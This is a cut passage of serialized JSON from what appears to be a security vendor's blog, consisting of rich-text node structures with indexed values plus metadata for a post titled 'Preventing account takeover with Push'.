ype":235,"data":205680,"content":205681},{},[205682],{"nodeType":173,"value":125683,"marks":205683,"data":205684},[],{},{"nodeType":178,"data":205686,"content":205687},{},[205688],{"nodeType":173,"value":183630,"marks":205689,"data":205690},[],{},{"nodeType":178,"data":205692,"content":205693},{},[205694,205697,205701,205704,205708,205711,205715],{"nodeType":173,"value":183637,"marks":205695,"data":205696},[],{},{"nodeType":173,"value":2740,"marks":205698,"data":205700},[205699],{"type":370},{},{"nodeType":173,"value":1464,"marks":205702,"data":205703},[],{},{"nodeType":173,"value":2748,"marks":205705,"data":205707},[205706],{"type":370},{},{"nodeType":173,"value":183652,"marks":205709,"data":205710},[],{},{"nodeType":173,"value":2701,"marks":205712,"data":205714},[205713],{"type":370},{},{"nodeType":173,"value":183660,"marks":205716,"data":205717},[],{},{"nodeType":178,"data":205719,"content":205720},{},[205721],{"nodeType":173,"value":183667,"marks":205722,"data":205723},[],{},{"nodeType":178,"data":205725,"content":205726},{},[205727],{"nodeType":173,"value":183674,"marks":205728,"data":205729},[],{},{"nodeType":312,"data":205731,"content":205734},{"target":205732},{"sys":205733},{"id":183681,"type":317,"linkType":318},[],{"nodeType":178,"data":205736,"content":205737},{},[205738,205741,205749],{"nodeType":173,"value":183606,"marks":205739,"data":205740},[],{},{"nodeType":1698,"data":205742,"content":205745},{"target":205743},{"sys":205744},{"id":2405,"type":317,"linkType":318},[205746],{"nodeType":173,"value":125683,"marks":205747,"data":205748},[],{},{"nodeType":173,"value":37,"marks":205750,"data":205751},[],{},{"nodeType":235,"data":205753,"content":205754},{},[205755],{"nodeType":173,"value":157048,"marks":205756,"data":205757},[],{},{"nodeType":178,"data":205759,"content":205760},{},[205761],{"nodeType":173,"value":183710,"marks":205762,"data":205763},[],{},{"nodeType":178,"data":205765,"content":205766},{},[205767],{"nodeType":173,"value":183717,"marks":205768,"data":205769},[],{},{"nodeType":178,"data":205771,"content":205772},{},[205773],{"nodeType":173,"value":183724,"marks":205774,"data":205775},[],{},{"nodeType":312,"data":205777,"content":205780},{"target":205778},{"sys":205779},{"id":183731,"type":317,"linkType":318},[],{"nodeType":178,"data":205782,"content":205783},{},[205784,205787,205795],{"nodeType":173,"value":183606,"marks":205785,"data":205786},[],{},{"nodeType":1698,"data":205788,"content":205791},{"target":205789},{"sys":205790},{"id":183743,"type":317,"linkType":318},[205792],{"nodeType":173,"value":157048,"marks":205793,"data":205794},[],{},{"nodeType":173,"value":37,"marks":205796,"data":205797},[],{},{"nodeType":235,"data":205799,"content":205800},{},[205801],{"nodeType":173,"value":183755,"marks":205802,"data":205803},[],{},{"nodeType":178,"data":205805,"content":205806},{},[205807],{"nodeType":173,"value":183762,"marks":205808,"data":205809},[],{},{"nodeType":178,"data":205811,"content":205812},{},[205813],{"nodeType":173,"value":183769,"marks":205814,"data":205815},[],{},{"nodeType":178,"data":205817,"content":205818},{},[205819],{"nodeType":173,"value":183776,"marks":205820,"data":205821},[],{},{"nodeType":312,"data":205823,"content":205826},{"target":205824},{"sys":205825},{"id":183783,"type":317,"linkType":318},[],{"nodeType":178,"data":205828,"content":205829},{},[205830,205833,205841],{"nodeType":173,"value":183606,"marks":205831,"data":205832},[],{},{"nodeType":1698,"data":205834,"content":205837},{"target":205835},{"sys":205836},{"id":114256,"type":317,"linkType":318},[205838],{"nodeType":173,"value":114259,"marks":205839,"data":205840},[],{},{"nodeType":173,"value":37,"marks":205842,"data":205843},[],{},{"nodeType":235,"data":205845,"content":205846},{},[205847],{"nodeType":173,"value":2631,"marks":205848,"data":205849},[],{},{"nodeType":178,"data":205851,"content":205852},{},[205853],{"nodeType":173,"value":183812,"marks":205854,"data":205855},[],{},{"nodeType":312,"data":205857,"content":205860},{"target":205858},{"sys":205859},{"id":183819,"type":317,"linkType":318},[],{"nodeType":178,"data":205862,"content":205863},{},[205864,205867,205875],{"nodeType":173,"value":183606,"marks":205865,"data":205866},[],{},{"nodeType":1698,"data":205868,"content":205871},{"target":205869},{"sys":205870},{"id":2466,"type":317,"linkType":318},[205872],{"nodeType":173,"value":126474,"marks":205873,"data":205874},[],{},{"nodeType":173,"value":37,"marks":205876,"data":205877},[],{},{"nodeType":169,"data":205879,"content":205880},{},[205881],{"nodeType":173,"value":183842,"marks":205882,"data":205883},[],{},{"nodeType":178,"data":205885,"content":205886},{},[205887],{"nodeType":173,"value":183849,"marks":205888,"data":205889},[],{},{"nodeType":178,"data":205891,"content":205892},{},[205893],{"nodeType":173,"value":183856,"marks":205894,"data":205895},[],{},{"nodeType":250,"data":205897,"content":205898},{},[205899,205912,205925],{"nodeType":254,"data":205900,"content":205901},{},[205902],{"nodeType":178,"data":205903,"content":205904},{},[205905,205909],{"nodeType":173,"value":157359,"marks":205906,"data":205908},[205907],{"type":370},{},{"nodeType":173,"value":157364,"marks":205910,"data":205911},[],{},{"nodeType":254,"data":205913,"content":205914},{},[205915],{"nodeType":178,"data":205916,"content":205917},{},[205918,205922],{"nodeType":173,"value":157374,"marks":205919,"data":205921},[205920],{"type":370},{},{"nodeType":173,"value":157379,"marks":205923,"data":205924},[],{},{"nodeType":254,"data":205926,"content":205927},{},[205928],{"nodeType":178,"data":205929,"content":205930},{},[205931,205935],{"nodeType":173,"value":157389,"marks":205932,"data":205934},[205933],{"type":370},{},{"nodeType":173,"value":157394,"marks":205936,"data":205937},[],{},{"nodeType":178,"data":205939,"content":205940},{},[205941],{"nodeType":173,"value":183905,"marks":205942,"data":205943},[],{},{"nodeType":250,"data":205945,"content":205946},{},[205947,205963,205979,205992],{"nodeType":254,"data":205948,"content":205949},{},[205950],{"nodeType":178,"data":205951,"content":205952},{},[205953,205956,205960],{"nodeType":173,"value":183918,"marks":205954,"data":205955},[],{},{"nodeType":173,"value":183922,"marks":205957,"data":205959},[205958],{"type":370},{},{"nodeType":173,"value":157428,"marks":205961,"data":205962},[],{},{"nodeType":254,"data":205964,"content":205965},{},[205966],{"nodeType":178,"data":205967,"content":205968},{},[205969,205972,205976],{"nodeType":173,"value":183936,"marks":205970,"data":205971},[],{},{"nodeType":173,"value":183940,"marks":205973,"data":205975},[205974],{"type":370},{},{"nodeType":173,"value":183945,"marks":205977,"data":205978},[],{},{"nodeType":254,"data":205980,"content":205981},{},[205982],{"nodeType":178,"data":205983,"content":205984},{},[205985,205989],{"nodeType":173,"value":183955,"marks":205986,"data":205988},[205987],{"type":370},{},{"nodeType":173,"value":183960,"marks":205990,"data":205991},[],{},{"nodeType":254,"data":205993,"content":205994},{},[205995],{"nodeType":178,"data":205996,"content":205997},{},[205998,206002],{"nodeType":173,"value":183970,"marks":205999,"data":206001},[206000],{"type":370},{},{"nodeType":173,"value":183975,"marks":206003,"data":206004},[],{},{"nodeType":178,"data":206006,"content":206007},{},[206008,206011,206015],{"nodeType":173,"value":183982,"marks":206009,"data":206010},[],{},{"nodeType":173,"value":2718,"marks":206012,"data":206014},[206013],{"type":370},{},{"nodeType":173,"value":183990,"marks":206016,"data":206017},[],{},{"nodeType":312,"data":206019,"content":206022},{"target":206020},{"sys":206021},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":206024,"content":206025},{},[206026],{"nodeType":173,"value":184003,"marks":206027,"data":206028},[],{},{"nodeType":169,"data":206030,"content":206031},{},[206032],{"nodeType":173,"value":184010,"marks":206033,"data":206034},[],{},{"nodeType":178,"data":206036,"content":206037},{},[206038],{"nodeType":173,"value":184017,"marks":206039,"data":206040},[],{},{"nodeType":178,"data":206042,"content":206043},{},[206044],{"nodeType":173,"value":184024,"marks":206045,"data":206046},[],{},{"nodeType":178,"data":206048,"content":206049},{},[206050,206053,206059],{"nodeType":173,"value":184031,"marks":206051,"data":206052},[],{},{"nodeType":186,"data":206054,"content":206055},{"uri":114007},[206056],{"nodeType":173,"value":184038,"marks":206057,"data":206058},[],{},{"nodeType":173,"value":184042,"marks":206060,"data":206061},[],{},{"nodeType":169,"data":206063,"content":206064},{},[206065],{"nodeType":173,"value":71801,"marks":206066,"data":206067},[],{},{"nodeType":178,"data":206069,"content":206070},{},[206071,206074,206080],{"nodeType":173,"value":184055,"marks":206072,"data":206073},[],{},{"nodeType":186,"data":206075,"content":206076},{"uri":114457},[206077],{"nodeType":173,"value":88194,"marks":206078,"data":206079},[],{},{"nodeType":173,"value":184065,"marks":206081,"data":206082},[],{},{"items":206084},[206085,206087],{"sys":206086,"name":18399},{"id":18398},{"sys":206088,"name":509},{"id":508},{"items":206090},[206091],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":206092},{"url":2911},{"items":206094},[206095],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":206096},{"url":1496},"content:blog:the-saas-attack-matrix-one-year-on.json","blog/the-saas-attack-matrix-one-year-on.json","blog/the-saas-attack-matrix-one-year-on",{"_path":206101,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":206102,"summary":206104,"title":196959,"subtitle":118,"metaTitle":206115,"synopsis":196960,"hashTags":118,"publishedDate":196961,"slug":196962,"ogImage":206116,"tagsCollection":206118,"authorsCollection":206124,"content":206128,"relatedBlogPostsCollection":207277,"_id":209131,"_type":5439,"_source":5440,"_file":209132,"_stem":209133,"_extension":5439},"/blog/how-to-prevent-account-takeover-with-push",{"id":195748,"publishedAt":206103},"2026-01-30T09:07:58.206Z",{"json":206105},{"data":206106,"content":206107,"nodeType":165},{},[206108],{"data":206109,"content":206110,"nodeType":178},{},[206111],{"data":206112,"marks":206113,"value":206114,"nodeType":173},{},[],"How Push controls stop attackers from using identity attack tools and techniques to compromise your employee user accounts. ","Preventing account takeover with Push",{"url":206117},"https://images.ctfassets.net/y1cdw1ablpvd/5K3kIkyFYdd3xFbOLAS7wd/ec2986c842a7c48a7b82e3bfcd19277d/Slide_16_9_-_40__1_.png",{"items":206119},[206120,206122],{"sys":206121,"name":509},{"id":508},{"sys":206123,"name":505},{"id":504},{"items":206125},[206126],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":206127},{"url":516},{"json":206129,"links":207173},{"nodeType":165,"data":206130,"content":206131},{},[206132,206138,206154,206160,206165,206171,206197,206202,206207,206213,206219,206224,206230,206246,206252,206258,206263,206269,206275,206317,206333,206339,206345,206351,206356,206362,206368,206374,206380,206386,206392,206402,206407,206413,206428,206444,206450,206456,206472,206478,206493,206499,206541,206547,206563,206569,206574,206589,206605,206611,206627,206633,206638,206644,206660,206666,206672,206677,206683,206689,206695,206701,206706,206712,206718,206724,206730,206735,206741,206747,206757,206770,206776,206782,206842,206848,206854,206860,206866,206872,206878,206884,206890,206906,206912,206917,206923,206928,206934,206940,206946,206951,206957,206963,206969,206999,207005,207011,207017,207023,207029,207035,207041,207047,207089,207094,207100,207136,207141,207147,207162,207167],{"nodeType":178,"data":206133,"content":206134},{},[206135],{"nodeType":173,"value":195757,"marks":206136,"data":206137},[],{},{"nodeType":178,"data":206139,"content":206140},{},[206141,206144,206151],{"nodeType":173,"value":195764,"marks":206142,"data":206143},[],{},{"nodeType":186,"data":206145,"content":206146},{"uri":195769},[206147],{"nodeType":173,"value":195772,"marks":206148,"data":206150},[206149],{"type":194},{},{"nodeType":173,"value":195777,"marks":206152,"data":206153},[],{},{"nodeType":178,"data":206155,"content":206156},{},[206157],{"nodeType":173,"value":195784,"marks":206158,"data":206159},[],{},{"nodeType":312,"data":206161,"content":206164},{"target":206162},{"sys":206163},{"id":195791,"type":317,"linkType":318},[],{"nodeType":178,"data":206166,"content":206167},{},[206168],{"nodeType":173,"value":195797,"marks":206169,"data":206170},[],{},{"nodeType":178,"data":206172,"content":206173},{},[206174,206177,206184,206187,206194],{"nodeType":173,"value":195804,"marks":206175,"data":206176},[],{},{"nodeType":186,"data":206178,"content":206179},{"uri":195809},[206180],{"nodeType":173,"value":71275,"marks":206181,"data":206183},[206182],{"type":194},{},{"nodeType":173,"value":195816,"marks":206185,"data":206186},[],{},{"nodeType":186,"data":206188,"content":206189},{"uri":118063},[206190],{"nodeType":173,"value":195823,"marks":206191,"data":206193},[206192],{"type":194},{},{"nodeType":173,"value":195828,"marks":206195,"data":206196},[],{},{"nodeType":312,"data":206198,"content":206201},{"target":206199},{"sys":206200},{"id":195835,"type":317,"linkType":318},[],{"nodeType":312,"data":206203,"content":206206},{"target":206204},{"sys":206205},{"id":195841,"type":317,"linkType":318},[],{"nodeType":178,"data":206208,"content":206209},{},[206210],{"nodeType":173,"value":195847,"marks":206211,"data":206212},[],{},{"nodeType":178,"data":206214,"content":206215},{},[206216],{"nodeType":173,"value":195854,"marks":206217,"data":206218},[],{},{"nodeType":312,"data":206220,"content":206223},{"target":206221},{"sys":206222},{"id":195861,"type":317,"linkType":318},[],{"nodeType":178,"data":206225,"content":206226},{},[206227],{"nodeType":173,"value":195867,"marks":206228,"data":206229},[],{},{"nodeType":178,"data":206231,"content":206232},{},[206233,206236,206243],{"nodeType":173,"value":195874,"marks":206234,"data":206235},[],{},{"nodeType":186,"data":206237,"content":206238},{"uri":195879},[206239],{"nodeType":173,"value":195882,"marks":206240,"data":206242},[206241],{"type":194},{},{"nodeType":173,"value":195887,"marks":206244,"data":206245},[],{},{"nodeType":169,"data":206247,"content":206248},{},[206249],{"nodeType":173,"value":195894,"marks":206250,"data":206251},[],{},{"nodeType":178,"data":206253,"content":206254},{},[206255],{"nodeType":173,"value":195901,"marks":206256,"data":206257},[],{},{"nodeType":312,"data":206259,"content":206262},{"target":206260},{"sys":206261},{"id":195908,"type":317,"linkType":318},[],{"nodeType":178,"data":206264,"content":206265},{},[206266],{"nodeType":173,"value":195914,"marks":206267,"data":206268},[],{},{"nodeType":178,"data":206270,"content":206271},{},[206272],{"nodeType":173,"value":195921,"marks":206273,"data":206274},[],{},{"nodeType":250,"data":206276,"content":206277},{},[206278,206291,206304],{"nodeType":254,"data":206279,"content":206280},{},[206281],{"nodeType":178,"data":206282,"content":206283},{},[206284,206288],{"nodeType":173,"value":195934,"marks":206285,"data":206287},[206286],{"type":370},{},{"nodeType":173,"value":195939,"marks":206289,"data":206290},[],{},{"nodeType":254,"data":206292,"content":206293},{},[206294],{"nodeType":178,"data":206295,"content":206296},{},[206297,206301],{"nodeType":173,"value":195949,"marks":206298,"data":206300},[206299],{"type":370},{},{"nodeType":173,"value":195954,"marks":206302,"data":206303},[],{},{"nodeType":254,"data":206305,"content":206306},{},[206307],{"nodeType":178,"data":206308,"content":206309},{},[206310,206314],{"nodeType":173,"value":195964,"marks":206311,"data":206313},[206312],{"type":370},{},{"nodeType":173,"value":195969,"marks":206315,"data":206316},[],{},{"nodeType":178,"data":206318,"content":206319},{},[206320,206323,206330],{"nodeType":173,"value":195976,"marks":206321,"data":206322},[],{},{"nodeType":186,"data":206324,"content":206325},{"uri":75099},[206326],{"nodeType":173,"value":195983,"marks":206327,"data":206329},[206328],{"type":194},{},{"nodeType":173,"value":1477,"marks":206331,"data":206332},[],{},{"nodeType":178,"data":206334,"content":206335},{},[206336],{"nodeType":173,"value":195994,"marks":206337,"data":206338},[],{},{"nodeType":169,"data":206340,"content":206341},{},[206342],{"nodeType":173,"value":196001,"marks":206343,"data":206344},[],{},{"nodeType":178,"data":206346,"content":206347},{},[206348],{"nodeType":173,"value":196008,"marks":206349,"data":206350},[],{},{"nodeType":312,"data":206352,"content":206355},{"target":206353},{"sys":206354},{"id":128839,"type":317,"linkType":318},[],{"nodeType":178,"data":206357,"content":206358},{},[206359],{"nodeType":173,"value":196020,"marks":206360,"data":206361},[],{},{"nodeType":178,"data":206363,"content":206364},{},[206365],{"nodeType":173,"value":196027,"marks":206366,"data":206367},[],{},{"nodeType":235,"data":206369,"content":206370},{},[206371],{"nodeType":173,"value":196034,"marks":206372,"data":206373},[],{},{"nodeType":178,"data":206375,"content":206376},{},[206377],{"nodeType":173,"value":196041,"marks":206378,"data":206379},[],{},{"nodeType":178,"data":206381,"content":206382},{},[206383],{"nodeType":173,"value":196048,"marks":206384,"data":206385},[],{},{"nodeType":178,"data":206387,"content":206388},{},[206389],{"nodeType":173,"value":196055,"marks":206390,"data":206391},[],{},{"nodeType":178,"data":206393,"content":206394},{},[206395,206399],{"nodeType":173,"value":196062,"marks":206396,"data":206398},[206397],{"type":370},{},{"nodeType":173,"value":196067,"marks":206400,"data":206401},[],{},{"nodeType":312,"data":206403,"content":206406},{"target":206404},{"sys":206405},{"id":196074,"type":317,"linkType":318},[],{"nodeType":178,"data":206408,"content":206409},{},[206410],{"nodeType":173,"value":196080,"marks":206411,"data":206412},[],{},{"nodeType":178,"data":206414,"content":206415},{},[206416,206419,206425],{"nodeType":173,"value":196087,"marks":206417,"data":206418},[],{},{"nodeType":186,"data":206420,"content":206421},{"uri":183466},[206422],{"nodeType":173,"value":155030,"marks":206423,"data":206424},[],{},{"nodeType":173,"value":196097,"marks":206426,"data":206427},[],{},{"nodeType":178,"data":206429,"content":206430},{},[206431,206434,206441],{"nodeType":173,"value":196104,"marks":206432,"data":206433},[],{},{"nodeType":186,"data":206435,"content":206436},{"uri":9099},[206437],{"nodeType":173,"value":196111,"marks":206438,"data":206440},[206439],{"type":194},{},{"nodeType":173,"value":197,"marks":206442,"data":206443},[],{},{"nodeType":235,"data":206445,"content":206446},{},[206447],{"nodeType":173,"value":196122,"marks":206448,"data":206449},[],{},{"nodeType":178,"data":206451,"content":206452},{},[206453],{"nodeType":173,"value":196129,"marks":206454,"data":206455},[],{},{"nodeType":178,"data":206457,"content":206458},{},[206459,206462,206469],{"nodeType":173,"value":196136,"marks":206460,"data":206461},[],{},{"nodeType":186,"data":206463,"content":206464},{"uri":196141},[206465],{"nodeType":173,"value":196144,"marks":206466,"data":206468},[206467],{"type":194},{},{"nodeType":173,"value":196149,"marks":206470,"data":206471},[],{},{"nodeType":178,"data":206473,"content":206474},{},[206475],{"nodeType":173,"value":196156,"marks":206476,"data":206477},[],{},{"nodeType":178,"data":206479,"content":206480},{},[206481,206484,206490],{"nodeType":173,"value":196163,"marks":206482,"data":206483},[],{},{"nodeType":186,"data":206485,"content":206486},{"uri":75027},[206487],{"nodeType":173,"value":196170,"marks":206488,"data":206489},[],{},{"nodeType":173,"value":1477,"marks":206491,"data":206492},[],{},{"nodeType":235,"data":206494,"content":206495},{},[206496],{"nodeType":173,"value":196180,"marks":206497,"data":206498},[],{},{"nodeType":178,"data":206500,"content":206501},{},[206502,206505,206511,206514,206520,206523,206529,206532,206538],{"nodeType":173,"value":196187,"marks":206503,"data":206504},[],{},{"nodeType":186,"data":206506,"content":206507},{"uri":196192},[206508],{"nodeType":173,"value":196195,"marks":206509,"data":206510},[],{},{"nodeType":173,"value":2936,"marks":206512,"data":206513},[],{},{"nodeType":186,"data":206515,"content":206516},{"uri":196203},[206517],{"nodeType":173,"value":196206,"marks":206518,"data":206519},[],{},{"nodeType":173,"value":2936,"marks":206521,"data":206522},[],{},{"nodeType":186,"data":206524,"content":206525},{"uri":181618},[206526],{"nodeType":173,"value":181621,"marks":206527,"data":206528},[],{},{"nodeType":173,"value":933,"marks":206530,"data":206531},[],{},{"nodeType":186,"data":206533,"content":206534},{"uri":196223},[206535],{"nodeType":173,"value":196226,"marks":206536,"data":206537},[],{},{"nodeType":173,"value":197,"marks":206539,"data":206540},[],{},{"nodeType":178,"data":206542,"content":206543},{},[206544],{"nodeType":173,"value":196236,"marks":206545,"data":206546},[],{},{"nodeType":178,"data":206548,"content":206549},{},[206550,206553,206560],{"nodeType":173,"value":196243,"marks":206551,"data":206552},[],{},{"nodeType":186,"data":206554,"content":206555},{"uri":196248},[206556],{"nodeType":173,"value":196251,"marks":206557,"data":206559},[206558],{"type":194},{},{"nodeType":173,"value":197,"marks":206561,"data":206562},[],{},{"nodeType":178,"data":206564,"content":206565},{},[206566],{"nodeType":173,"value":196262,"marks":206567,"data":206568},[],{},{"nodeType":312,"data":206570,"content":206573},{"target":206571},{"sys":206572},{"id":98287,"type":317,"linkType":318},[],{"nodeType":178,"data":206575,"content":206576},{},[206577,206580,206586],{"nodeType":173,"value":196274,"marks":206578,"data":206579},[],{},{"nodeType":186,"data":206581,"content":206582},{"uri":183466},[206583],{"nodeType":173,"value":155030,"marks":206584,"data":206585},[],{},{"nodeType":173,"value":196284,"marks":206587,"data":206588},[],{},{"nodeType":178,"data":206590,"content":206591},{},[206592,206595,206602],{"nodeType":173,"value":196291,"marks":206593,"data":206594},[],{},{"nodeType":186,"data":206596,"content":206597},{"uri":75048},[206598],{"nodeType":173,"value":196298,"marks":206599,"data":206601},[206600],{"type":194},{},{"nodeType":173,"value":197,"marks":206603,"data":206604},[],{},{"nodeType":169,"data":206606,"content":206607},{},[206608],{"nodeType":173,"value":196309,"marks":206609,"data":206610},[],{},{"nodeType":178,"data":206612,"content":206613},{},[206614,206617,206624],{"nodeType":173,"value":196316,"marks":206615,"data":206616},[],{},{"nodeType":186,"data":206618,"content":206619},{"uri":74621},[206620],{"nodeType":173,"value":196323,"marks":206621,"data":206623},[206622],{"type":194},{},{"nodeType":173,"value":196328,"marks":206625,"data":206626},[],{},{"nodeType":178,"data":206628,"content":206629},{},[206630],{"nodeType":173,"value":196335,"marks":206631,"data":206632},[],{},{"nodeType":312,"data":206634,"content":206637},{"target":206635},{"sys":206636},{"id":196342,"type":317,"linkType":318},[],{"nodeType":178,"data":206639,"content":206640},{},[206641],{"nodeType":173,"value":196348,"marks":206642,"data":206643},[],{},{"nodeType":178,"data":206645,"content":206646},{},[206647,206650,206657],{"nodeType":173,"value":174980,"marks":206648,"data":206649},[],{},{"nodeType":186,"data":206651,"content":206652},{"uri":174985},[206653],{"nodeType":173,"value":174988,"marks":206654,"data":206656},[206655],{"type":194},{},{"nodeType":173,"value":1477,"marks":206658,"data":206659},[],{},{"nodeType":178,"data":206661,"content":206662},{},[206663],{"nodeType":173,"value":196371,"marks":206664,"data":206665},[],{},{"nodeType":178,"data":206667,"content":206668},{},[206669],{"nodeType":173,"value":196378,"marks":206670,"data":206671},[],{},{"nodeType":312,"data":206673,"content":206676},{"target":206674},{"sys":206675},{"id":196385,"type":317,"linkType":318},[],{"nodeType":235,"data":206678,"content":206679},{},[206680],{"nodeType":173,"value":196391,"marks":206681,"data":206682},[],{},{"nodeType":178,"data":206684,"content":206685},{},[206686],{"nodeType":173,"value":196398,"marks":206687,"data":206688},[],{},{"nodeType":178,"data":206690,"content":206691},{},[206692],{"nodeType":173,"value":196405,"marks":206693,"data":206694},[],{},{"nodeType":178,"data":206696,"content":206697},{},[206698],{"nodeType":173,"value":196412,"marks":206699,"data":206700},[],{},{"nodeType":312,"data":206702,"content":206705},{"target":206703},{"sys":206704},{"id":105035,"type":317,"linkType":318},[],{"nodeType":235,"data":206707,"content":206708},{},[206709],{"nodeType":173,"value":196424,"marks":206710,"data":206711},[],{},{"nodeType":178,"data":206713,"content":206714},{},[206715],{"nodeType":173,"value":196431,"marks":206716,"data":206717},[],{},{"nodeType":178,"data":206719,"content":206720},{},[206721],{"nodeType":173,"value":196438,"marks":206722,"data":206723},[],{},{"nodeType":178,"data":206725,"content":206726},{},[206727],{"nodeType":173,"value":196445,"marks":206728,"data":206729},[],{},{"nodeType":312,"data":206731,"content":206734},{"target":206732},{"sys":206733},{"id":196452,"type":317,"linkType":318},[],{"nodeType":169,"data":206736,"content":206737},{},[206738],{"nodeType":173,"value":196458,"marks":206739,"data":206740},[],{},{"nodeType":178,"data":206742,"content":206743},{},[206744],{"nodeType":173,"value":196465,"marks":206745,"data":206746},[],{},{"nodeType":178,"data":206748,"content":206749},{},[206750,206754],{"nodeType":173,"value":196472,"marks":206751,"data":206753},[206752],{"type":370},{},{"nodeType":173,"value":196477,"marks":206755,"data":206756},[],{},{"nodeType":178,"data":206758,"content":206759},{},[206760,206763,206767],{"nodeType":173,"value":196484,"marks":206761,"data":206762},[],{},{"nodeType":173,"value":196488,"marks":206764,"data":206766},[206765],{"type":370},{},{"nodeType":173,"value":196493,"marks":206768,"data":206769},[],{},{"nodeType":178,"data":206771,"content":206772},{},[206773],{"nodeType":173,"value":196500,"marks":206774,"data":206775},[],{},{"nodeType":178,"data":206777,"content":206778},{},[206779],{"nodeType":173,"value":196507,"marks":206780,"data":206781},[],{},{"nodeType":250,"data":206783,"content":206784},{},[206785,206804,206823],{"nodeType":254,"data":206786,"content":206787},{},[206788],{"nodeType":178,"data":206789,"content":206790},{},[206791,206794,206801],{"nodeType":173,"value":196520,"marks":206792,"data":206793},[],{},{"nodeType":186,"data":206795,"content":206796},{"uri":74621},[206797],{"nodeType":173,"value":196323,"marks":206798,"data":206800},[206799],{"type":194},{},{"nodeType":173,"value":197,"marks":206802,"data":206803},[],{},{"nodeType":254,"data":206805,"content":206806},{},[206807],{"nodeType":178,"data":206808,"content":206809},{},[206810,206813,206820],{"nodeType":173,"value":196540,"marks":206811,"data":206812},[],{},{"nodeType":186,"data":206814,"content":206815},{"uri":88025},[206816],{"nodeType":173,"value":196547,"marks":206817,"data":206819},[206818],{"type":194},{},{"nodeType":173,"value":1477,"marks":206821,"data":206822},[],{},{"nodeType":254,"data":206824,"content":206825},{},[206826],{"nodeType":178,"data":206827,"content":206828},{},[206829,206832,206839],{"nodeType":173,"value":196561,"marks":206830,"data":206831},[],{},{"nodeType":186,"data":206833,"content":206834},{"uri":196566},[206835],{"nodeType":173,"value":196569,"marks":206836,"data":206838},[206837],{"type":194},{},{"nodeType":173,"value":481,"marks":206840,"data":206841},[],{},{"nodeType":178,"data":206843,"content":206844},{},[206845],{"nodeType":173,"value":196580,"marks":206846,"data":206847},[],{},{"nodeType":235,"data":206849,"content":206850},{},[206851],{"nodeType":173,"value":196587,"marks":206852,"data":206853},[],{},{"nodeType":178,"data":206855,"content":206856},{},[206857],{"nodeType":173,"value":196594,"marks":206858,"data":206859},[],{},{"nodeType":178,"data":206861,"content":206862},{},[206863],{"nodeType":173,"value":196601,"marks":206864,"data":206865},[],{},{"nodeType":178,"data":206867,"content":206868},{},[206869],{"nodeType":173,"value":196608,"marks":206870,"data":206871},[],{},{"nodeType":178,"data":206873,"content":206874},{},[206875],{"nodeType":173,"value":196615,"marks":206876,"data":206877},[],{},{"nodeType":235,"data":206879,"content":206880},{},[206881],{"nodeType":173,"value":196622,"marks":206882,"data":206883},[],{},{"nodeType":178,"data":206885,"content":206886},{},[206887],{"nodeType":173,"value":196629,"marks":206888,"data":206889},[],{},{"nodeType":178,"data":206891,"content":206892},{},[206893,206896,206903],{"nodeType":173,"value":196636,"marks":206894,"data":206895},[],{},{"nodeType":186,"data":206897,"content":206898},{"uri":4342},[206899],{"nodeType":173,"value":196643,"marks":206900,"data":206902},[206901],{"type":194},{},{"nodeType":173,"value":197,"marks":206904,"data":206905},[],{},{"nodeType":178,"data":206907,"content":206908},{},[206909],{"nodeType":173,"value":196654,"marks":206910,"data":206911},[],{},{"nodeType":312,"data":206913,"content":206916},{"target":206914},{"sys":206915},{"id":196661,"type":317,"linkType":318},[],{"nodeType":178,"data":206918,"content":206919},{},[206920],{"nodeType":173,"value":196667,"marks":206921,"data":206922},[],{},{"nodeType":312,"data":206924,"content":206927},{"target":206925},{"sys":206926},{"id":196674,"type":317,"linkType":318},[],{"nodeType":235,"data":206929,"content":206930},{},[206931],{"nodeType":173,"value":196680,"marks":206932,"data":206933},[],{},{"nodeType":178,"data":206935,"content":206936},{},[206937],{"nodeType":173,"value":196687,"marks":206938,"data":206939},[],{},{"nodeType":178,"data":206941,"content":206942},{},[206943],{"nodeType":173,"value":196694,"marks":206944,"data":206945},[],{},{"nodeType":312,"data":206947,"content":206950},{"target":206948},{"sys":206949},{"id":196701,"type":317,"linkType":318},[],{"nodeType":235,"data":206952,"content":206953},{},[206954],{"nodeType":173,"value":196707,"marks":206955,"data":206956},[],{},{"nodeType":178,"data":206958,"content":206959},{},[206960],{"nodeType":173,"value":196714,"marks":206961,"data":206962},[],{},{"nodeType":178,"data":206964,"content":206965},{},[206966],{"nodeType":173,"value":196721,"marks":206967,"data":206968},[],{},{"nodeType":250,"data":206970,"content":206971},{},[206972,206981,206990],{"nodeType":254,"data":206973,"content":206974},{},[206975],{"nodeType":178,"data":206976,"content":206977},{},[206978],{"nodeType":173,"value":196734,"marks":206979,"data":206980},[],{},{"nodeType":254,"data":206982,"content":206983},{},[206984],{"nodeType":178,"data":206985,"content":206986},{},[206987],{"nodeType":173,"value":196744,"marks":206988,"data":206989},[],{},{"nodeType":254,"data":206991,"content":206992},{},[206993],{"nodeType":178,"data":206994,"content":206995},{},[206996],{"nodeType":173,"value":196754,"marks":206997,"data":206998},[],{},{"nodeType":178,"data":207000,"content":207001},{},[207002],{"nodeType":173,"value":196761,"marks":207003,"data":207004},[],{},{"nodeType":235,"data":207006,"content":207007},{},[207008],{"nodeType":173,"value":196768,"marks":207009,"data":207010},[],{},{"nodeType":178,"data":207012,"content":207013},{},[207014],{"nodeType":173,"value":196775,"marks":207015,"data":207016},[],{},{"nodeType":178,"data":207018,"content":207019},{},[207020],{"nodeType":173,"value":196782,"marks":207021,"data":207022},[],{},{"nodeType":178,"data":207024,"content":207025},{},[207026],{"nodeType":173,"value":196789,"marks":207027,"data":207028},[],{},{"nodeType":235,"data":207030,"content":207031},{},[207032],{"nodeType":173,"value":196796,"marks":207033,"data":207034},[],{},{"nodeType":178,"data":207036,"content":207037},{},[207038],{"nodeType":173,"value":196803,"marks":207039,"data":207040},[],{},{"nodeType":178,"data":207042,"content":207043},{},[207044],{"nodeType":173,"value":196810,"marks":207045,"data":207046},[],{},{"nodeType":250,"data":207048,"content":207049},{},[207050,207063,207076],{"nodeType":254,"data":207051,"content":207052},{},[207053],{"nodeType":178,"data":207054,"content":207055},{},[207056,207060],{"nodeType":173,"value":196823,"marks":207057,"data":207059},[207058],{"type":370},{},{"nodeType":173,"value":196828,"marks":207061,"data":207062},[],{},{"nodeType":254,"data":207064,"content":207065},{},[207